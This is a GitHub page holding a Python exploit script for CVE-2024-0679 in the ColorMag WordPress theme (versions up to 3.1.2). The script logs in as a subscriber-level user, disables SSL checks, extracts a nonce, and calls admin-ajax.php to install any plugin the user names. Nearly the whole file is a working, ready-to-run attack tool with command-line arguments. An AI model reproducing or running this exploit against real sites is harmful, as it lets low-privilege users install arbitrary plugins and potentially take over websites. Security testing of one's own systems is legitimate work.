-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-0679.py
84 lines (62 loc) · 3.26 KB
/
CVE-2024-0679.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/env python3
import requests
import argparse
import os
import re
#
# Exploit script by @RandomRobbieBF
#
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
# Ignore bad SSL
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def login_and_activate_plugin(siteurl, wp_user, wp_pass,slug,plugin):
# Log in
session = requests.Session()
session.verify = False # Ignore SSL verification
login_url = siteurl + '/wp-login.php'
login_response = session.post(login_url, verify=False, data={
'log': wp_user,
'pwd': wp_pass,
'rememberme': 'forever',
'wp-submit': 'Log+In'
})
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
else:
print("Failed to log in.")
exit()
# Get REST API Nonce
print('Getting Nonce!')
nonce_match = re.search(r'Processing...","nonce":"([^"]+)"', login_response.text)
if nonce_match:
nonce_value = nonce_match.group(1)
print(nonce_value)
else:
print("No Nonce Found")
exit()
# Install Plugin
print('Installing Plugin!')
paramsPost = {"action":"install_plugin","security":nonce_value,"plugin":plugin,"slug":slug}
headers = {"Origin":siteurl,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0","Referer":""+siteurl+"/wp-admin/themes.php?page=colormag&tab=products","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
install_response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers,verify=False,cookies=cookies)
print("HTTP STATUS: "+str(install_response.status_code)+" Response: "+install_response.text+"")
# Add the vulnerability description as a comment
DESCRIPTION = """
ColorMag <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Description
CVE-2024-0679 - The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.
"""
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('--url', required=True, help='URL of the WordPress site')
parser.add_argument('--username', required=True, help='WordPress username')
parser.add_argument('--password', required=True, help='WordPress password')
parser.add_argument('--slug', required=True, help='WordPress Plugin Slug')
parser.add_argument('--plugin', required=True, help='WordPress Plugin PHP file i.e learning-management-system%2Flms.php')
args = parser.parse_args()
login_and_activate_plugin(args.url, args.username, args.password,args.slug,args.plugin)